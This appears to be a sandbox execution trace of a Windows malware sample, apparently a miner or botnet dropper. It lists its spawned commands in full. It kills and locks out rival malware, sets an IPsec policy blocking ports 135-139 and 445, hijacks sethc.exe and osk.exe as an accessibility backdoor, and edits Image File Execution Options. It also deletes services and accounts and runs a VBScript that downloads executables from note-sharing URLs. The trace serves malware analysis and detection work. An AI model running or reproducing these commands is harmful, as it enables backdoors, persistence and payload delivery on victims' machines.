C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\WmiAppSvr\csrss.exe" /d everyone3⤵PID:1544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4784
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\WmiApprsv\csrss.exe" /d everyone3⤵PID:1116
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\programdata\\wmiappsrv\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
PID:7612
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\WmiAppSvr\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
PID:8184
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\programdata\\wmiapprsv\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
PID:7880
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\WmiAppSvr\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
PID:4792
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\programdata\\wmiapprsv\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
PID:2344
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\WmiAppSrv\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
PID:4932
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
PID:900
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\WmiAppSvr\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
PID:5296
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\WmiAppRsv\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
PID:5328
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='tasksche.exe' and ExecutablePath='C:\\Windows\\tasksche.exe'" call Terminate3⤵
- Kills process with WMI
PID:3212
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5364
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64\csrss.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5380
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5396
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe" /d everyone3⤵PID:5404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7776
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64\csrss.exe" /d everyone3⤵PID:7724
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\clr_optimization_v4.0.30318_64\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
PID:5464
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\clr_optimization_v4.0.30318_64\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
PID:5544
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im boy.exe3⤵
- Kills process with taskkill
PID:6508
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\boy.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:6472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:6456
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\boy.exe /d everyone3⤵PID:6448
-
-
C:\Windows\SysWOW64\sc.exesc start PolicyAgent3⤵
- Launches sc.exe
PID:3208
-
-
C:\Windows\SysWOW64\sc.exesc config PolicyAgent start= AUTO3⤵PID:6556
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all3⤵PID:6576
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Aliyun3⤵PID:6628
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=Allowlist3⤵PID:7392
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=denylist3⤵PID:1660
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1353⤵PID:4616
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1373⤵PID:5608
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1383⤵PID:4796
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1393⤵PID:7228
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=4453⤵PID:2188
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=Allow action=permit3⤵PID:1876
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block3⤵PID:6460
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny3⤵PID:7924
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Aliyun assign=y3⤵PID:2360
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "NETControlUpdate" /f3⤵PID:5612
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "WinHostStartForMachine" /f3⤵PID:7436
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftUpdate" /f3⤵PID:7296
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "AdobeFlashPlayer" /f3⤵PID:1768
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "Adobe Flash Player Updaters" /f3⤵PID:5308
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "Font upgrade service" /f3⤵PID:3344
-
-
C:\Windows\SysWOW64\sc.exesc stop FastUserSwitchingCompatibility3⤵
- Launches sc.exe
PID:5644
-
-
C:\Windows\SysWOW64\sc.exesc delete FastUserSwitchingCompatibility3⤵
- Launches sc.exe
PID:5392
-
-
C:\Windows\SysWOW64\sc.exesc stop PSEXESVC3⤵
- Launches sc.exe
PID:5412
-
-
C:\Windows\SysWOW64\sc.exesc delete PSEXESVC3⤵
- Launches sc.exe
PID:5480
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im rundll32.exe3⤵
- Kills process with taskkill
PID:5396
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r +a C:\Windows\SpeechsTracing3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:4940
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='spoolsv.exe' and ExecutablePath='C:\\Windows\\SpeechsTracing\\spoolsv.exe'" call Terminate3⤵
- Kills process with WMI
PID:7200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7928
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SpeechsTracing\spoolsv.exe /d everyone3⤵PID:4872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5376
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SpeechsTracing /t /d everyone3⤵PID:5368
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\SecureBootThemes\\Microsoft\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
PID:1536
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\sysprepthemes\\microsoft\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
PID:4504
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\SpeechsTracing\\Microsoft\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
PID:1276
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r +a C:\Windows\SecureBootThemes3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:7292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5208
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SecureBootThemes /p everyone:n /d system3⤵PID:4344
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r +a C:\Windows\System32\wmassrv.dll3⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
PID:7460
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r +a C:\Windows\System32\HalPluginsServices.dll3⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
PID:5336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4872
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\wmassrv.dll /d everyone3⤵PID:1152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5708
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\HalPluginsServices.dll /d everyone3⤵PID:5652
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r +a C:\Windows\sysprepthemes3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:3344
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4276
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\sysprepthemes /d everyone3⤵PID:5412
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WScript.exe /im *.tmp /im *.jpg /im *.cc33⤵
- Kills process with taskkill
PID:5220
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\program files (x86)\exfg"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:7736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1268
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\program files (x86)\exfg" /d everyone3⤵PID:2408
-
-
C:\Windows\SysWOW64\sc.exesc stop "Amxend Msbtvsqv Ble"3⤵
- Launches sc.exe
PID:568
-
-
C:\Windows\SysWOW64\sc.exesc delete "Amxend Msbtvsqv Ble"3⤵
- Launches sc.exe
PID:2328
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1664
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\programdata\application data\storm\update" /g users:r3⤵PID:4504
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\*.cc3 /a3⤵
- Modifies file permissions
PID:968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5660
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\*.cc3" /t /p everyone:n3⤵PID:3688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3748
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\programdata\application data\storm\update\*.cc3" /t /p everyone:n3⤵PID:1276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7292
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\programdata\application data\storm\update\*.tmp" /t /p everyone:n3⤵PID:1220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3212
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\programdata\application data\storm\update\*.jpg" /t /p everyone:n3⤵PID:3824
-
-
C:\Windows\SysWOW64\sc.exesc stop bddlsvc3⤵PID:5336
-
-
C:\Windows\SysWOW64\sc.exesc delete bddlsvc3⤵PID:5308
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im crawler.exe /im Crowdtest.exe /im CrowdtestWatcher.exe /im Kerrigan.exe /im adb.exe /im phantomjs.exe3⤵
- Kills process with taskkill
PID:1152
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CrowdtestWatcher.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
PID:7776
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /end /tn "Securitycript"3⤵PID:5528
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn Securitycript /f3⤵PID:2352
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn GooglePinginConfigs /f3⤵PID:5644
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn RavTask /f3⤵PID:5220
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im Setting.exe3⤵
- Kills process with taskkill
PID:1380
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\Program Files (x86)\Microsoft MSBuild\Setting.exe"3⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
PID:1744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5476
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Microsoft MSBuild\Setting.exe" /d everyone3⤵PID:7736
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Microsoft MSBuild\Setting.exe" /p everyone:n /d system3⤵PID:7220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c c:\windows\inf\temp1.bat2⤵PID:3488
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\sethc.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4792
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /g Administrators:f3⤵PID:4332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2816
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g Users:r3⤵PID:1884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3260
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g Administrators:r3⤵PID:4932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3312
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /d SERVICE3⤵PID:3308
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2360
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /d "network service"3⤵PID:984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3600
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g system:r3⤵PID:4988
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\osk.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1124
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3568
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\osk.exe /g Administrators:f3⤵PID:3268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2536
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\osk.exe /e /g Users:r3⤵PID:4592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3140
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\osk.exe /e /g Administrators:r3⤵PID:1420
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4084
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\osk.exe /e /d SERVICE3⤵PID:2764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:556
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\osk.exe /e /d "network service"3⤵PID:4336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3200
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\osk.exe /e /g system:r3⤵PID:2428
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f3⤵PID:4276
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smss.exe" /f3⤵PID:4448
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sqlser.exe" /f3⤵PID:4476
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe" /f3⤵
- Sets file execution options in registry
PID:2900
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\Fonts\smss.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5000
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Fonts\smss.exe /g everyone:f3⤵PID:2480
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\sethc.exe /a3⤵
- Modifies file permissions
PID:5004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:444
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /g system:f3⤵PID:1524
-
-
C:\Windows\SysWOW64\cscript.execscript xxoo.vbs "http://note.youdao.com/yws/api/personal/file/WEBb6b3acba5104f41c9b364680f28de9f9?method=download&inline=true&shareKey=c5aa6f51dffffee47d0ee728d894f348" C:\Windows\Temp\0AHM.exe3⤵
- Blocklisted process makes network request
PID:4960
-
-
C:\Windows\SysWOW64\cscript.execscript xxoo.vbs "http://note.youdao.com/yws/api/personal/file/WEB413662f5cc07627e58c48fe17d4d29d0?method=download&inline=true&shareKey=eb9998a97429406e7ea9f4bf2bf14549" C:\Windows\Temp\0osk.exe3⤵
- Blocklisted process makes network request
PID:8052
-
-
C:\Windows\SysWOW64\PING.EXEping -n 5 127.13⤵
- Runs ping.exe
PID:8116
-
-
C:\Windows\SysWOW64\sc.exesc stop HostManger3⤵PID:5704
-
-
C:\Windows\SysWOW64\sc.exesc delete HostManger3⤵PID:7316
-
-
C:\Windows\SysWOW64\sc.exesc stop Hostserver3⤵
- Launches sc.exe
PID:4160
-
-
C:\Windows\SysWOW64\sc.exesc delete Hostserver3⤵PID:1688
-
-
C:\Windows\SysWOW64\sc.exesc stop ServicesMain3⤵PID:2236
-
-
C:\Windows\SysWOW64\sc.exesc delete ServicesMain3⤵
- Launches sc.exe
PID:2956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\fonts /a3⤵
- Modifies file permissions
PID:5456
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\Fonts\rundllhost.exe /a3⤵
- Modifies file permissions
PID:5420
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\Fonts\dlllhost.exe /a3⤵
- Modifies file permissions
PID:5704
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\Fonts\conhost.exe /a3⤵
- Modifies file permissions
PID:4796
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\Fonts\svchost.exe /a3⤵
- Modifies file permissions
PID:7860
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\Fonts\csrss.exe /a3⤵
- Modifies file permissions
PID:2984
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\Fonts\KvMonXP.exe /a3⤵
- Modifies file permissions
PID:4372
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Windows\Fonts\KvMonXP.exe3⤵
- Views/modifies file attributes
PID:7924
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Windows\Fonts\rundllhost.exe3⤵
- Views/modifies file attributes
PID:3276
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Windows\Fonts\dlllhost.exe3⤵
- Views/modifies file attributes
PID:3972
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Windows\Fonts\conhost.exe3⤵
- Views/modifies file attributes
PID:2272
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Windows\Fonts\svchost.exe3⤵
- Views/modifies file attributes
PID:1884
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Windows\Fonts\csrss.exe3⤵
- Views/modifies file attributes
PID:7008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5460
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\Fonts\rundllhost.exe" /g everyone:f3⤵PID:3044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5448
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\Fonts\dlllhost.exe" /g everyone:f3⤵PID:5420
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5664
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\Fonts\conhost.exe" /g everyone:f3⤵PID:3256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7968
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\Fonts\svchost.exe" /g everyone:f3⤵PID:5544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3988
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\Fonts\csrss.exe" /g everyone:f3⤵PID:2252
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7904
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\Fonts\KvMonXP.exe" /g everyone:f3⤵PID:6488
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
PID:4936
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\Fonts\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
PID:4480
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\Fonts\\conhost.exe'" call Terminate3⤵
- Kills process with WMI
PID:6468
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='lsass.exe' and ExecutablePath='C:\\Windows\\Fonts\\lsass.exe'" call Terminate3⤵
- Kills process with WMI
PID:7232
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im rundllhost.exe3⤵
- Kills process with taskkill
PID:4792
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im dlllhost.exe3⤵
- Kills process with taskkill
PID:1512
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im KvMonXP.exe3⤵
- Kills process with taskkill
PID:3440
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im dllhots.exe3⤵
- Kills process with taskkill
PID:7020
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im d11hots.exe3⤵
- Kills process with taskkill
PID:2472
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvMonXP.exe" /f3⤵PID:2900
-
-
C:\Windows\SysWOW64\sc.exesc stop MicrosotMais3⤵
- Launches sc.exe
PID:5664
-
-
C:\Windows\SysWOW64\sc.exesc delete MicrosotMais3⤵
- Launches sc.exe
PID:5644
-
-
C:\Windows\SysWOW64\sc.exesc delete MicrosotMaims3⤵
- Launches sc.exe
PID:5212
-
-
C:\Windows\SysWOW64\sc.exesc stop MicrosotMaims3⤵PID:6576
-
-
C:\Windows\SysWOW64\sc.exesc stop MicrosotSais3⤵PID:5808
-
-
C:\Windows\SysWOW64\sc.exesc delete MicrosotSais3⤵
- Launches sc.exe
PID:6388
-
-
C:\Windows\SysWOW64\sc.exesc stop MicrosotSaims3⤵PID:7460
-
-
C:\Windows\SysWOW64\sc.exesc delete MicrosotSaims3⤵
- Launches sc.exe
PID:5348
-
-
C:\Windows\SysWOW64\sc.exesc stop ServiceSaims3⤵
- Launches sc.exe
PID:5372
-
-
C:\Windows\SysWOW64\sc.exesc delete ServiceSaims3⤵PID:1536
-
-
C:\Windows\SysWOW64\sc.exesc stop ServiceSais3⤵PID:5220
-
-
C:\Windows\SysWOW64\sc.exesc delete ServiceSais3⤵
- Launches sc.exe
PID:1268
-
-
C:\Windows\SysWOW64\sc.exesc stop ServiceMais3⤵PID:7724
-
-
C:\Windows\SysWOW64\sc.exesc delete ServiceMais3⤵PID:4032
-
-
C:\Windows\SysWOW64\sc.exesc stop ServiceMaims3⤵
- Launches sc.exe
PID:1868
-
-
C:\Windows\SysWOW64\sc.exesc delete ServiceMaims3⤵
- Launches sc.exe
PID:7848
-
-
C:\Windows\SysWOW64\sc.exesc stop NetPipeAtcivator3⤵
- Launches sc.exe
PID:2408
-
-
C:\Windows\SysWOW64\sc.exesc delete NetPipeAtcivator3⤵
- Launches sc.exe
PID:1276
-
-
C:\Windows\SysWOW64\sc.exesc stop FormManger3⤵PID:5660
-
-
C:\Windows\SysWOW64\sc.exesc delete FormManger3⤵
- Launches sc.exe
PID:3688
-
-
C:\Windows\SysWOW64\sc.exesc stop Famserver3⤵PID:1444
-
-
C:\Windows\SysWOW64\sc.exesc delete Famserver3⤵
- Launches sc.exe
PID:6576
-
-
C:\Windows\SysWOW64\sc.exesc delete Samsorver3⤵PID:5808
-
-
C:\Windows\SysWOW64\sc.exesc stop Samsorver3⤵PID:7376
-
-
C:\Windows\SysWOW64\sc.exesc delete Microsarver3⤵
- Launches sc.exe
PID:6392
-
-
C:\Windows\SysWOW64\sc.exesc stop Microsarver3⤵PID:3824
-
-
C:\Windows\SysWOW64\net.exenet user mm123$ /del3⤵PID:4276
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user mm123$ /del4⤵PID:5344
-
-
-
C:\Windows\SysWOW64\net.exenet user admin$ /del3⤵PID:7436
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user admin$ /del4⤵PID:7776
-
-
-
C:\Windows\SysWOW64\net.exenet user aliyun /del3⤵PID:1268
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user aliyun /del4⤵PID:7736
-
-
-
C:\Windows\SysWOW64\net.exenet user lcy /del3⤵PID:1868
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user lcy /del4⤵PID:2136
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im rundll32.exe3⤵
- Kills process with taskkill
PID:5408
-
-
